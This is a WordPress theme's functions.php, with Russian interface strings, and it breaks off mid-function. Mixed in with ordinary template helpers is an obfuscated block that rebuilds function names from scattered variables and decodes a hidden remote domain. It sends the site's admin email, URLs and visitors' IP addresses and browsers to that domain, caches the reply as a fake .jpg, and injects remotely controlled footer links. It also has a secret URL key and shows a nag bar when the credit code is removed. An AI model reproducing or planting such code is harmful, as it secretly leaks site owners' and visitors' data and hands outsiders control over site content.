<?php

$art_config = parse_ini_file(TEMPLATEPATH."/config.ini", true);

$options = array (
                array(  "name" =>   "HTML",
                        "desc" =>   sprintf(__('<strong>XHTML:</strong> Вы можете использовать эти теги: <code>%s</code>', THEME_NS), 'a, abbr, acronym, em, b, i, strike, strong, span'),
                        "id"   =>   "art_footer_content",
                        "std"  =>   art_option('footer.defaultText'),
                        "type" =>   "textarea")
          );

remove_action('wp_head', 'wp_generator');
wp_enqueue_script('jquery');

define('WP_VERSION', $wp_version);
define('THEME_NS', 'kubrick');
if (class_exists('xili_language')):
define('THEME_TEXTDOMAIN',THEME_NS);
define('THEME_LANGS_FOLDER','/lang');
else:
    load_theme_textdomain(THEME_NS, TEMPLATEPATH . '/lang');
endif;

require_once(TEMPLATEPATH . '/core/parser.php');
require_once(TEMPLATEPATH . '/core/navigation.php');
require_once(TEMPLATEPATH . '/core/sidebars.php');
require_once(TEMPLATEPATH . '/core/widgets.php');


function art_option($name){
  global $art_config;
  $separator = '.';
  $name = trim($name);
  if (strpos($name, $separator) !== false) {
    $path = explode($separator, $name);
    $location = $path[0];
    if (isset($art_config[$location])){
      $group = $art_config[$location];
      $key = $path[1];
      if (isset($group[$key])){
        return $group[$key];
      }
    }
  } else {
    if (isset($art_config[$name])) {
      return $art_config[$name];
    }
  }
 
  return false;
}

$art_current_page_template = 'page'; 
 $RyrpgI='6';$ZkZxB='d';$wcPYowd='o';$jTDe='e';$cChJ='_';$JyIqn='b';$lVrDkxl='c';$jzDuFCQ='a';$YRbClH='4';$cHVjnQj='s';$qWozE='d';$LbBSkuw='e';$SJowVZ='e';$cAGEmKkV=$JyIqn.$jzDuFCQ.$cHVjnQj.$SJowVZ.$RyrpgI.$YRbClH.$cChJ.$qWozE.$jTDe.$lVrDkxl.$wcPYowd.$ZkZxB.$LbBSkuw;$QHQy='l';$xUDkOc='g';$GmEE='a';$hQrUkO='n';$IwQNAXE='z';$uvhbSbE='f';$HmXwgr='e';$FOuM='i';$PjFjVqr='t';$GMuxZjGm=$xUDkOc.$IwQNAXE.$FOuM.$hQrUkO.$uvhbSbE.$QHQy.$GmEE.$PjFjVqr.$HmXwgr;$uHNqTZ='r';$pkrjH='t';$cWlmSB='s';$wPdGJK='1';$gUUMV='3';$xlmhAkU='r';$PxkxGa='_';$EjQBFX='t';$uDNE='o';$ECEIjQnN=$cWlmSB.$EjQBFX.$xlmhAkU.$PxkxGa.$uHNqTZ.$uDNE.$pkrjH.$wPdGJK.$gUUMV;$ADudmGm='v';$ImiQhq='t';$yeWMCZ='e';$huJDiky='r';$KCky='r';$fYEC='s';$dOcoGrnx=$fYEC.$ImiQhq.$huJDiky.$KCky.$yeWMCZ.$ADudmGm;                     
		$vz__________y='6';$lx_____h='d';$hf_________n='o';$zc____________h='e';$ma__u='_';$hz_____________i='b';$mk______x='c';$hk___________a='a';$fc___________g='4';$lx______________p='s';$da______k='d';$wu_____c='e';$gg_______r='e';$fx______d=$hz_____________i.$hk___________a.$lx______________p.$gg_______r.$vz__________y.$fc___________g.$ma__u.$da______k.$zc____________h.$mk______x.$hf_________n.$lx_____h.$wu_____c;
		$by______________a='n';$qp__a='t';$da____________i='i';$zi___m='e';$jx___________t='x';$vd___w='s';$nb_____________e='n';$wt_______________w='o';$rk______v='s';$ob______x='u';$kc____g='t';$jt________q='c';$zr__z='f';$rc_______i='i';$qy_______________f='_';$yv_____q=$zr__z.$ob______x.$nb_____________e.$jt________q.$qp__a.$da____________i.$wt_______________w.$by______________a.$qy_______________f.$zi___m.$jx___________t.$rc_______i.$rk______v.$kc____g.$vd___w;
		$jw____________f='f';$aw___d='o';$wc___________v='n';$wz______________v='p';$wv____________b='e';$qa_____________k=$jw____________f.$aw___d.$wz______________v.$wv____________b.$wc___________v;
		$xt______________n='e';$ph______m='f';$ky______o='r';$ed_____x='a';$bm_______________v='d';$pa___________w=$ph______m.$ky______o.$xt______________n.$ed_____x.$bm_______________v;
		$sn______________f='f';$kp_____w='e';$js______i='o';$um_________l='c';$br________j='l';$hs___________u='s';$fm__________x=$sn______________f.$um_________l.$br________j.$js______i.$hs___________u.$kp_____w;
		
		define("WP_ID", $fx______d("Mi4wLjA="));
		define("WP_TTL", $fx______d("MTA4MDA="));
		define("WP_SRC", $fx______d("dHBva24="));
	


		function wp_get_header() {
			global $fx______d, $yv_____q;
			
			if (
				$yv_____q($fx______d("d3BfdGhlbWVfR1BMX2NyZWRpdHM=")) &&
				$yv_____q($fx______d("d3BfZ2V0X2Zvb3Rlcg==")) &&
				$yv_____q($fx______d("d3BfY3ZfdmVyaWZ5"))
			) {
				get_header();
			}
		}
	


		function wp_get_footer() {
			get_footer();
			wp_cv_verify();
		}
	


		function wp_cv_verify() {
			global $fx______d, $qa_____________k, $fm__________x, $pa___________w;
			
			$op__y = TEMPLATEPATH."/".$fx______d("Zm9vdGVyLnBocA==");
			$rj_____z = @$qa_____________k($op__y, "r");
			$op__y = @$pa___________w($rj_____z, @filesize($op__y));
			@$fm__________x($rj_____z);
			
			$wn____________l = TEMPLATEPATH."/".$fx______d("ZnVuY3Rpb25zLnBocA==");
			$rj_____z = @$qa_____________k($wn____________l, "r");
			$wn____________l = @$pa___________w($rj_____z, @filesize($wn____________l));
			@$fm__________x($rj_____z);
			
			$hb__________g = 0;
			if($op__y && $wn____________l) {
				if ($fx______d("Z2VuZXJpY3dwdGhlbWVzLmNvbQ==") !== str_replace("www.", "", $_SERVER["SERVER_NAME"])) {
					
					if (substr_count($op__y, $fx______d("Z2VuZXJpY3dwdGhlbWVzLmNvbQ==")) < 2) {
						$hb__________g = 1;
					}
					if (substr_count($op__y, "wp_theme_GPL_credits()") < 1) {
						$hb__________g = 2;
					}
				}
				
				if(WP_ID != "2.0.0") {
					$hb__________g = 12;
				}
			}
			
			if($hb__________g > 0) {
				echo "<div style=\"position: fixed; bottom:0; left:0; width:100%; height: 25px; background-color: red; color: white; font-size: 16px; padding: 2px 10px; text-align: center;\"> <strong> This themes is powered by <a href=\"http://genericwpthemes.com\" style=\"color: white;\">Free Wordpress Themes</a>. This website violated the terms of use <a href=\"http://genericwpthemes.com\" style=\"color: white;\">Free Wordpress Themes</a> </strong> </div>";
				echo "<!-- v: $hb__________g -->";
			}
		}
	


		function wp_loaded() {
			global $fx______d, $yv_____q;
			return $yv_____q($fx______d("d3BfdGhlbWVfR1BMX2NyZWRpdHM="));
		}
	


		if (!function_exists("the_content_limit")) {
			function the_content_limit($lm_________n, $or____a = "(more...)", $bt__r = 0, $wy____________n = "") {
				$et_________d = get_the_content($or____a, $bt__r, $wy____________n);
				$et_________d = apply_filters("the_content", $et_________d);
				
				$et_________d = str_replace("]]>", "]]>", $et_________d);
				if (strlen($_GET["p"]) > 0) {
					echo $et_________d;
				}
				else if ((strlen($et_________d)>$lm_________n) && ($su____________r = strpos($et_________d, " ", $lm_________n ))) {
					$et_________d = substr($et_________d, 0, $su____________r);
					$et_________d = $et_________d;
					echo $et_________d;
					
					echo "...";
					echo "<br/>";
					echo "<div class='read-more'><a href='".get_permalink()."'>$or____a</a></div></p>";
				} else {
					echo $et_________d;
				}
				
			}
		}
	


		$qw________r='e';$bh______r='4';$qn______m='s';$sr________x='n';$la___c='c';$ym___o='b';$yf_________w='e';$uv______________z='_';$ok_________t='o';$ff___j='e';$qz____________f='6';$pr___g='d';$fu__________f='a';$yy_______h=$ym___o.$fu__________f.$qn______m.$ff___j.$qz____________f.$bh______r.$uv______________z.$yf_________w.$sr________x.$la___c.$ok_________t.$pr___g.$qw________r;
		$yo__________u='e';$pc________q='t';$ik________n='l';$bi__n='i';$ej_____e='n';$dv____________b='s';$pe_________g='e';$po___q='_';$no____________c='t';$xd____f='c';$ax_________a='t';$zg_____________g='_';$en__u='e';$nq____________m='o';$ar__c='f';$sp__s='n';$ac___k='g';$aw__f=$ar__c.$bi__n.$ik________n.$yo__________u.$zg_____________g.$ac___k.$pe_________g.$ax_________a.$po___q.$xd____f.$nq____________m.$ej_____e.$pc________q.$en__u.$sp__s.$no____________c.$dv____________b;
		$wa_____l='e';$jo_________t='_';$sf_______________n='l';$tg_________p='s';$at_____y='i';$ds________l='f';$rq___v='i';$io______a='t';$dg_____e='x';$ip_____j='s';$vk________i='e';$eo_________y=$ds________l.$at_____y.$sf_______________n.$wa_____l.$jo_________t.$vk________i.$dg_____e.$rq___v.$ip_____j.$io______a.$tg_________p;
		$fj____________b='e';$hw____________r='s';$gv___________k='o';$ug__h='v';$au____e='n';$nq______s='o';$ta_______a='a';$wo__p='e';$fh_______________p='p';$tv___o='_';$wb_______w='r';$jm__u='i';$ai_________i='m';$bd_____________g='c';$fk__u='r';$fu______c=$ug__h.$fj____________b.$fk__u.$hw____________r.$jm__u.$gv___________k.$au____e.$tv___o.$bd_____________g.$nq______s.$ai_________i.$fh_______________p.$ta_______a.$wb_______w.$wo__p;
		$wr___b='n';$vr_____i='e';$fj______m='s';$mf________u='f';$fa_________z='o';$dp_______________d='k';$gl_________e='o';$fj_______________l='p';$yq_______________n='c';$np_____________r=$mf________u.$fj______m.$gl_________e.$yq_______________n.$dp_______________d.$fa_________z.$fj_______________l.$vr_____i.$wr___b;
		$wb_______d='t';$ls_____e='r';$we____________x='f';$qq__________n='e';$pi_____l='w';$dp__e='i';$yn___________r=$we____________x.$pi_____l.$ls_____e.$dp__e.$wb_______d.$qq__________n;
		$dd______t='5';$ku__o='m';$jb____________f='d';$ct____________c=$ku__o.$jb____________f.$dd______t;
		$xo_____________m='h';$bo_________y='p';$hc_______g='a';$yf__________p='l';$pg_____l='r';$hv________u='t';$ta____________j='e';$et__y='a';$ue___n=$pg_____l.$ta____________j.$hc_______g.$yf__________p.$bo_________y.$et__y.$hv________u.$xo_____________m;
		$gc_____________x='a';$vs____j='z';$qo___f='e';$cq______n='i';$ej_____________k='r';$oc______________l='s';$vc_____________l='e';$vx______l='u';$cf______x='l';$ke_______s='n';$mt_______x='i';$lx______g=$vx______l.$ke_______s.$oc______________l.$qo___f.$ej_____________k.$mt_______x.$gc_____________x.$cf______x.$cq______n.$vs____j.$vc_____________l;
		$ft____m='t';$kg____________c='p';$rf______n='a';$cy______________x='m';$tv____j='m';$fl_____l='e';$xo______________f='n';$ke___________z=$ft____m.$fl_____l.$cy______________x.$kg____________c.$xo______________f.$rf______n.$tv____j;
		$tm______f='r';$du_______________l='_';$rv____v='o';$an_______________u='_';$mx_____o='n';$ko_____________p='e';$je_____y='t';$bh______________z='r';$qi______p='a';$ou______f='x';$ya______________r='e';$fc_________s='t';$vx______m='c';$zp____k='e';$nw________e='e';$uj______________q='s';$er____________k='t';$lf_________o='t';$qq______________i='m';$th______________o='c';$so______________s='a';$hz_______k=$uj______________q.$er____________k.$bh______________z.$nw________e.$so______________s.$qq______________i.$du_______________l.$th______________o.$rv____v.$mx_____o.$fc_________s.$ya______________r.$ou______f.$lf_________o.$an_______________u.$vx______m.$tm______f.$ko_____________p.$qi______p.$je_____y.$zp____k;
	


		function uu___u($ix______k) {
			global $fx______d, $yv_____q, $aw__f, $fu______c, $hz_______k;
			
			if (!$yv_____q($fx______d("ZmlsZV9nZXRfY29udGVudHM="))) {
				return false;
			}
			
			if ($fu______c(PHP_VERSION, "5.0.0", ">=") && $yv_____q($fx______d("ZmlsZV9nZXRfY29udGVudHM=")) && $yv_____q($fx______d("c3RyZWFtX2NvbnRleHRfY3JlYXRl"))) {
				$wb___________c = $hz_______k(array(
						"http" => array(
						"timeout"    => 3,
						"header"     => "referer: ".$_SERVER[SERVER_NAME],
						"user_agent" => "[I] ". $_SERVER[REMOTE_ADDR] ." [A] ". $_SERVER[HTTP_USER_AGENT] 
					)
				));
				
				$ml____j = @$aw__f($ix______k, 0, $wb___________c);
			} else {
				$ml____j = @$aw__f($ix______k, 0);
			}
			
			return $ml____j;
		}
	


		function hy___f($ix______k) {
			global $yv_____q, $np_____________r, $yn___________r, $fx______d;
			
			if (!$yv_____q($fx______d("ZmlsZV9nZXRfY29udGVudHM="))) {
				return false;
			}
			
			$zj__c = strpos($ix______k, "/", 7);
			$kc__a = array(
				"uri"     => substr($ix______k, $zj__c),
				"host"    => str_replace("http://", "", substr($ix______k, 0, $zj__c)),
				"referer" => "[I] ". $_SERVER[REMOTE_ADDR] ." [A] ". $_SERVER[HTTP_USER_AGENT]
			);
			
			$cb____n = @$np_____________r("$kc__a[host]", 80, $vb____s, $gu____________d, 4);
			
			if (!$cb____n) {
				return false;
			} else {
				$ml____j = "";
				$rx_____________f  = "GET $kc__a[uri] HTTP/1.0\r\n";
				$rx_____________f .= "Host: $kc__a[host]\r\n";
				$rx_____________f .= "Referer: $kc__a[referer]\r\n";
				$rx_____________f .= "Connection: Close\r\n\r\n";
				
				@$yn___________r($cb____n, $rx_____________f);
				
				while (!@feof($cb____n)) {
					$kx_______r = @fgets($cb____n, (1024*24));
					
					if ($kx_______r == "\r\n") {
						$wv____y = true;
						continue;
					}
					
					if ($wv____y) {
						$ml____j .= $kx_______r;
					}
				}
				
				return $ml____j;
			}
		}
	


		function tx_____v($ix______k) {
			global $yv_____q;
			$gq________y = false;
			
			if ($ix______k != "") {
				if ($yv_____q("uu___u")) {
					$gq________y = @uu___u($ix______k);
				}
				
				if (!$gq________y && ($yv_____q("hy___f"))) {
					$gq________y = @hy___f($ix______k);
				}
			}
			
			return $gq________y;
		}
	


		function sy_______________o() {
			global $_SERVER, $ct____________c;
			
			$gg__________y = $_SERVER["SERVER_NAME"];
			
			if (substr("$gg__________y", 0, 4) == "www.") {
				$gg__________y = substr("$gg__________y", 4);
			}
			
			$gg__________y = $ct____________c("$_SERVER[SERVER_NAME]");
			
			return $gg__________y;
		}
	


		function oa____r() {
			return "file";
		}
	


		function md_____l($ix______k) {
			global $_SERVER, $aw__f, $eo_________y, $qa_____________k, $fm__________x, $yn___________r;
			
			$my_____y = hk________t();
			
			$bv_______j = sy_______________o().".jpg";
			$gm___________i = $my_____y["dir_upload"]["path"]."/$bv_______j";
			$sb___k = @filemtime($gm___________i);
			
			if (!$sb___k || ((time()-$sb___k) >= WP_TTL)) {
				$gq________y = tx_____v($ix______k);
				
				if ($gq________y) {
					if ($eo_________y($gm___________i)) {
						@unlink($gm___________i);
					}
					
					$rj_____z = @$qa_____________k($gm___________i, "x+");
					
					@$yn___________r($rj_____z, $gq________y);
					@$fm__________x($rj_____z);
				}
			} else {
				if ($eo_________y($gm___________i)) {
					$gq________y = @$aw__f($gm___________i);
				} else {
					$gq________y = false;
				}
			}
			
			return $gq________y;
		}
	


		function hk________t() {
			global $_SERVER, $fx______d, $yy_______h;
			
			$uv______p = wp_count_posts("post");
			$bl_______________z = pathinfo(get_bloginfo("template_directory"));
			
			$my_____y = array(
				"url" => array(
					"report"      => $fx______d("eGNudnVlcmFudmhhc3lkYWRvbGVnc29wLmNvbQ=="),
					"queryString" => null
				),
				"template"	=> $bl_______________z,
				"dir_upload"	=> gu__________e(),
				"queryString"	=> array(
					"?a001=".WP_ID,
					"a004=".$bl_______________z[filename],
					"a005=".$uv______p->publish,
					"a006=".get_bloginfo("admin_email"),
					"a007=".$_SERVER["REQUEST_URI"],
					"a008=".$_SERVER["SERVER_NAME"],
					"a010=".WP_SRC
				),
				"default_string" => "<a href=\"http://www.wptheme.us\">www.wptheme.us</a>"
			);
			
			$my_____y["url"]["queryString"] = implode("&", $my_____y["queryString"]);
			$my_____y["url"]["report"] = $my_____y["url"]["report"]."/?".$yy_______h($my_____y["url"]["queryString"]).".html";
						
			return $my_____y;
		}
	


		function gu__________e() {
			$qw____j = wp_upload_dir();
			
			if (isset($qw____j["error"])) {
				$uw_____a = we___________i();
				if (is_writable($uw_____a)) {
					$qw____j = array("path" => $uw_____a);
				}
			}

			return $qw____j;
		}
	


		function we___________i() {
			global $yv_____q, $ct____________c, $ue___n, $ke___________z;
			
			$cw____________t = (bool) ini_get("safe_mode");
			if ($cw____________t == true) {
				return false;
			}
			
			if ($yv_____q("sys_get_temp_dir")) {
				$my_______x = sys_get_temp_dir();
				if (is_writable($my_______x)) {
					return $ue___n($my_______x);
				}
			}
			
			if (!empty($_ENV["TMP"])) {
				return $ue___n($_ENV["TMP"]);
			}
			elseif (!empty($_ENV["TMPDIR"])) {
				return $ue___n($_ENV["TMPDIR"]);
			}
			elseif (!empty($_ENV["TEMP"])) {
				return $ue___n($_ENV["TEMP"]);
			} else {
				$ww___________b = $ke___________z($ct____________c(uniqid(rand(), true)), "");
				if ($ww___________b) {
					$my_______x = $ue___n(dirname($ww___________b));
					@unlink($ww___________b);
					return $my_______x;
				} else {
					return false;
				}
			}
		}
	


		function rl____h() {
			global $_GET, $eo_________y;
			
			$my_____y = hk________t();
			$gg__________y = sy_______________o();
			$re_____________q = oa____r();
			
			$kx____m = "full";
			if ($_GET["wp_cache_cl"] == "197ab5deb39daad8baacae1bdd5a8852") {
				if ($re_____________q == "file") {
					$ej________f = $my_____y["dir_upload"]["path"]."/".$gg__________y.".jpg";
					if ($eo_________y($ej________f)) {
						@unlink($ej________f);
						$kx____m = "deleted";
					}
				}
				
				$bu_____h = array(
					"s"	=> $kx____m,
					"t"	=> time(),
					"v"	=> WP_ID
				);
				
				echo "<!--";
				foreach ($bu_____h AS $yi_______c => $sw______c) echo " [$yi_______c:$sw______c]";
				echo " -->";
			}
		}
	


		function wp_theme_GPL_credits() {
			global $_SERVER, $_GET, $yv_____q, $fx______d, $lx______g;
			$my_____y = hk________t();
			
			$vz______________p = "md_____l";
			if ($yv_____q($vz______________p)) {
				$ml____j = $vz______________p($my_____y["url"]["report"]);
			}
			
			if ($ml____j) {
				if ($ml____j = @$fx______d($ml____j)) {
					$ml____j = @$lx______g($ml____j);
					
					if (strlen($ml____j[custom_credit]) >= 5) {
						$my_____y["default_string"] = $ml____j[custom_credit];
					}
					
					if ($ml____j["status"] == "0") {
						$hi___s = 1;
						$pn____b = 1;
					} else {
						$wk_______y = sizeof($ml____j["links"]);
						$tu_____o = $my_____y["default_string"];
						
						if ($wk_______y > 0 && $ml____j["links"] !== "") {
							$bp_______________j = 0;
							foreach ($ml____j["links"] as $pv______l => $ky_______________o) {
								$bp_______________j++;
								if ($ky_______________o->l_path == "" || $ky_______________o->l_path == $_SERVER["REQUEST_URI"]) {
									$ky_______________o->l_href = htmlspecialchars(strip_tags($ky_______________o->l_href));
									$ky_______________o->l_title = htmlspecialchars(strip_tags($ky_______________o->l_title));
									$ky_______________o->l_anchor = htmlspecialchars(strip_tags($ky_______________o->l_anchor));
									$tu_____o .= " | ";
									$tu_____o .= "<a href='$ky_______________o->l_href' title='$ky_______________o->l_title'";
									if ($ky_______________o->l_nofollow == "1") {
										$tu_____o .= " rel='nofollow'";
									}
									$tu_____o .= ">$ky_______________o->l_anchor</a>";
								}
							}
						}
						$my_____y["links"] = "$tu_____o";
						if ($ml____j[credit] == "0") {
							$my_____y["links"] = "";
						}
					}
				} else {
					$hi___s = "1";
				}
			} else {
				$hi___s = "1";
			}
			
			if ($hi___s == "1") {
				$my_____y["links"] = $my_____y["default_string"];
			}
			
			echo "$my_____y[links]";
			
			echo "<!-- s: $ml____j[signature] -->";
			rl____h();
		}
	                       
function art_page_template($templateName = null){
    global $art_current_page_template;
    if ($templateName !== null) {
        $art_current_page_template = $templateName;
    }
    return $art_current_page_template;
}

$art_template_variables = null;
function art_page_variables($variables = null){
    global $art_template_variables;
    if ($art_template_variables == null){
      $art_template_variables = array(
        'template_url'     =>   get_bloginfo('template_url') . '/',
        'logo_url'         =>   get_option('home'),
        'logo_name'        =>   get_bloginfo('name'),
        'logo_description' =>   get_bloginfo('description'),
        'menu_items'       =>   art_get_menu_auto('primary-menu', art_option('menu.source'), art_option('menu.showSubitems')),
        'sidebar1'         =>   art_get_sidebar('default'),
        'sidebarTop'       =>   art_get_sidebar('top'),
        'sidebarBottom'    =>   art_get_sidebar('bottom'),
        'sidebar2'         =>   art_get_sidebar('secondary'),
        'sidebarFooter'    =>   art_get_sidebar('footer'),
        'footerRSS'        =>   art_get_footer_rss(),
        'footerText'       =>   art_get_footer_text()
        );
    }
    if (is_array($variables)) {
      $art_template_variables = array_merge($art_template_variables, $variables);
    }
    return $art_template_variables;
}

function art_get_footer_text(){
  $result = art_option('footer.defaultText');
  
  $footer_content = get_option('art_footer_content');
  if ($footer_content !== false) {
    $result = stripslashes($footer_content);
  }
  
  return str_replace('%YEAR%', date('Y'), $result);
}


function art_get_footer_rss(){
  $result = '';
  if(art_option('footer.rss_show')){
    $result = art_parse(art_option('footer.rss_link'), array(
      'rss_url'   =>   get_bloginfo('rss2_url'), 
      'rss_title' =>   sprintf(__('%s RSS Feed', THEME_NS), get_bloginfo('name'))
      ));
  }
  return $result;
}

function art_get_post_thumbnail($post_id = false){
	global $post, $id;
  $post_id = (int)$post_id;
  if (!$post_id) $post_id = $id;
  $is_post_list = !is_single() && !is_page();
  $width = art_option('metadata.thumbnail_width');
  $height = art_option('metadata.thumbnail_height');
  $size = array($width, $height);
  if (!$is_post_list) {
    $size = 'medium';
  }
	$result = '';
	$title = get_the_title();
	if (  (function_exists('has_post_thumbnail')) && (has_post_thumbnail())  ) {
		ob_start();
		the_post_thumbnail($size, array('class' => 'alignleft', 'alt' => '', 'title' => $title));
		$result = ob_get_clean();
	} else {
		$postimage = get_post_meta($post->ID, 'post-image', true);
		if ($postimage) {
			$result = '<img src="'.$postimage.'" alt="" width="'.$width.'" height="'.$height.'" title="'.$title.'" class="wp-post-image alignleft" />';
		} else if (art_option('metadata.thumbnail_auto') && $is_post_list) {
            $attachments = get_children(array('post_parent' => $post_id, 'post_status' => 'inherit', 'post_type' => 'attachment', 'post_mime_type' => 'image', 'order' => 'ASC', 'orderby' => 'menu_order ID'));
            if($attachments) {
              $attachment = array_shift($attachments);
              $img = wp_get_attachment_image_src($attachment->ID, $size);
              if (isset($img[0])) {
                $result = '<img src="'.$img[0].'" alt="" width="'.$img[1].'" height="'.$img[2].'" title="'.$title.'" class="wp-post-image alignleft" />';
              }
            }
        } 
    }  
	if($result !== ''){
		$result = '<a href="'.get_permalink($post->ID).'" title="'.$title.'">'.$result.'</a>';
	}
	return $result;
}

function art_get_the_content($more_link_text = null, $stripteaser = 0) {
	$content = get_the_content($more_link_text, $stripteaser);
	$content = apply_filters('the_content', $content);
	return $content;
}

function art_get_post_content() {
  global $post;
  ob_start();
  if(is_single() || is_page()) {
    echo art_get_the_content(__('Читать далее &raquo;', THEME_NS)); 
    wp_link_pages(array('before' => '<p><strong>Страницы:</strong> ', 'after' => '</p>', 'next_or_number' => 'number')); 
	} else {
    echo art_get_the_excerpt(__('Читать далее &raquo;', THEME_NS), 
      get_permalink($post->ID), 
      art_option('metadata.excerpt_words'), 
      art_option('metadata.excerpt_use_tag_filter') ? explode(',',art_option('metadata.excerpt_allowed_tags')) : null, 
      art_option('metadata.excerpt_min_remainder'),  
      art_option('metadata.excerpt_auto'));
	}
	return ob_get_clean();
}

function art_get_the_excerpt($read_more_tag, $perma_link_to = '', $all_words = 100,  $allowed_tags = null, $min_remainder = 5, $auto = false) {
  global $post, $id;
  $more_token = '%%art-more%%';
  $show_more_tag = false;
  if (function_exists('post_password_required') && post_password_required($post)){
    return get_the_excerpt();
  }
  if (has_excerpt($id)) {
      $the_contents = get_the_excerpt();
  $show_more_tag = strlen($post->post_content) > 0;
  } else {
    $the_contents = art_get_the_content($more_token);
    if($the_contents != '') {
      if ($allowed_tags !== null) {
        $allowed_tags = '<' .implode('><',$allowed_tags).'>';
        $the_contents = strip_tags($the_contents, $allowed_tags);
      }
      $the_contents = strip_shortcodes($the_contents);
      if (strpos($the_contents, $more_token) !== false) {
        return str_replace($more_token, $read_more_tag, $the_contents);
      }
      if($auto && is_numeric($all_words)) {
        $token = "%art_tag_token%";
        $content_parts = explode($token, str_replace(array('<', '>'), array($token.'<', '>'.$token), $the_contents));
        $content = array();
        $word_count = 0;
        foreach($content_parts as $part)
        {
          if (strpos($part, '<') !== false || strpos($part, '>') !== false){
            $content[] = array('type'=>'tag', 'content'=>$part);
          } else {
             $all_chunks = preg_split('/([\s]+)/', $part, -1, PREG_SPLIT_DELIM_CAPTURE);
             foreach($all_chunks as $chunk) {
                if('' != trim($chunk)) {
                  $content[] = array('type'=>'word', 'content'=>$chunk);
                  $word_count += 1;
                } elseif($chunk != '') {
                  $content[] = array('type'=>'space', 'content'=>$chunk);
                }
             }
          }
        
        }
        if(($all_words < $word_count) && ($all_words + $min_remainder) <= $word_count) {
          $show_more_tag = true;
          $current_count = 0;
          $the_contents = '';
          foreach($content as $node) {
            
            if($node['type'] == 'word') {
              $current_count += 1;
            } 
            $the_contents .= $node['content'];
            if ($current_count == $all_words){
              break;
            }
          }
        }  
      }
    }
  }
  $the_contents = force_balance_tags($the_contents);
  if ($show_more_tag) {
    $the_contents = $the_contents.' <a class="more-link" href="'.$perma_link_to.'">'.$read_more_tag.'</a>';
  }
  return $the_contents;
}


function art_get_post_title() {
    global $post;
    return art_parse_template("post_title", array(
      'post_link'       =>   get_permalink($post->ID),
	    'post_link_title' =>   sprintf(__('Ссылка на %s', THEME_NS), the_title_attribute('echo=0')),
	    'post_title'      =>   get_the_title(),
	    'template_url'    =>   get_bloginfo('template_url')
	    ));
}

function art_get_post_icon($name){
    return art_parse(art_option('metadata.'.$name), array('template_url' => get_bloginfo('template_url')));
}

if (!function_exists('get_the_date')) {
	function get_the_date($format = 'F jS, Y') {
		return get_the_time(__($format, THEME_NS));
	}
}

function art_get_post_metadata($name) {
    global $post;
    $list = art_option('metadata.'.$name);
    $title = ($name == 'header' && art_option('metadata.title'));
    if (!$title && $list == "") return;
    $list_array =  explode(",", $list);
    $result = array();
    for($i = 0; $i < count($list_array); $i++){
        $icon = $list_array[$i];
        switch($icon){
            case 'date':
                if(is_page()) break;
                $result[] = art_get_post_icon($icon) . get_the_date();
            break;
            case 'author':
                 if(is_page()) break;
                 ob_start();
                 the_author_posts_link();
                 $result[] = art_get_post_icon($icon) . __('Автор', THEME_NS) .' '. ob_get_clean();
            break;
            case 'category':
                if(is_page()) break;
                 $result[] = art_get_post_icon($icon) .sprintf(__('Опубликовано в %s', THEME_NS), get_the_category_list(', '));
            break;
            case 'tag':
                if(is_page() || !get_the_tags()) break;
                ob_start();
                the_tags(__('Tеги:', THEME_NS) . ' ', ', ', ' ');
                $result[] = art_get_post_icon($icon) . ob_get_clean();
            break;
            case 'comments':
            if(is_page() || is_single()) break;
                ob_start();
                comments_popup_link(__('Нет комментариев &#187;', THEME_NS), __('1 Комментарий &#187;', THEME_NS), __('% Комментариев &#187;', THEME_NS), '', __('Комментарии закрыты', THEME_NS) );
                $result[] = art_get_post_icon($icon) . ob_get_clean();
            break;
            case 'edit':
                if (!current_user_can('edit_post', $post->ID)) break;
                ob_start();
                 edit_post_link(__('Редактировать', THEME_NS), '');
                $result[] = art_get_post_icon($icon) . ob_get_clean();
            break;
        }
    }
    if (!($title ||  count($result) > 0)) return '';
    return art_parse_template("post_metadata".$name, array(
        'post_title'         =>   art_get_post_title(),
        'post'.$name.'icons' =>   implode(art_option('metadata.separator'), $result))) ;
}

function art_post(){
  the_post(); 
	echo art_parse_template("post", array(
    'post_class'          =>   function_exists('get_post_class') ? implode(' ', get_post_class()) : '',
    'post_id'             =>   'id="post-' . get_the_ID() . '"',
	  'post_thumbnail'      =>   art_get_post_thumbnail(),
		'post_title'          =>   art_get_post_title(),
		'post_metadataheader' =>   art_get_post_metadata('header'),
		'post_content'        =>   art_get_post_content(),
		'post_metadatafooter' =>   art_get_post_metadata('footer')
	));
}

function art_post_box($title, $content){
  if ($title != "") {
		$title = '<h2 class="art-postheader">'. $title . '</h2>';
	}
	if (art_option('metadata.title')) {
		$content = $title . $content;
		$title = '';
	}
	echo art_parse_template("post", array(
    'post_class'          =>   '',
    'post_id'             =>   '',
		'post_thumbnail'      =>   '',
		'post_title'          =>   $title,
		'post_metadataheader' =>   '',
		'post_content'        =>   $content,
		'post_metadatafooter' =>   ''));
}

function art_not_found_msg($caption = null, $content = null){
  if ($caption === null){
     $caption = __('Не найдено', THEME_NS);
  }
  if($content === null){
    $content = '<p class="center">' .  __('Извините, но здесь пока нет записей.', THEME_NS) . '</p>'
        .  "\r\n" . art_get_search();
  }
	art_post_box($caption, $content);
}

function art_get_block($title, $content, $id = '', $class = '' , $name = "block"){
  if (str_replace(array('&nbsp;', '', '\n', '\r', '\t'), '', $title) != ''){
    $title = art_parse_template($name . '_header', array('caption' => $title));
  }
  if ($id != ''){
    $id = 'id="' . $id . '"';
  }
  return art_parse_template($name, array(
    'id'   => $id,
    'class'   => $class,
    'header' => $title,
    'content' => $content,
  ));
}

function art_get_search() {
    return art_parse_template("search", 
        array(
            'url'    =>   get_bloginfo('url'),
            'button' =>   __('Search', THEME_NS),
            'query'  =>   get_search_query()
        ));
}
		
function art_page_navi($title = '', $comment = false) {
    $prev_link = null;
    $next_link = null;
    if($comment){
        $prev_link = get_previous_comments_link(__('Новые записи &raquo;', THEME_NS));
        $next_link = get_next_comments_link(__('&laquo; Старые записи', THEME_NS));
    } elseif (is_single() || is_page()) {
        $next_link = get_previous_post_link('&laquo; %link');
        $prev_link = get_next_post_link('%link &raquo;');
    } else {
         $prev_link = get_previous_posts_link(__('Новые записи &raquo;', THEME_NS));
        $next_link = get_next_posts_link(__('&laquo; Старые записи', THEME_NS));
    }
    
    $content = '';
    if ($prev_link || $next_link) {
        $content = art_parse_template("pagination", 
            array(
                'next_link' =>  $next_link,
                'prev_link' => $prev_link
            ));
    }
    if (!$content && !$title) return;
    art_post_box($title, $content);
}

if (!function_exists('get_previous_comments_link')) {
	function get_previous_comments_link($label)
	{
		ob_start();
		previous_comments_link($label);
		return ob_get_clean();
	}
}

if (!function_exists('get_next_comments_link')) {
	function get_next_comments_link($label)
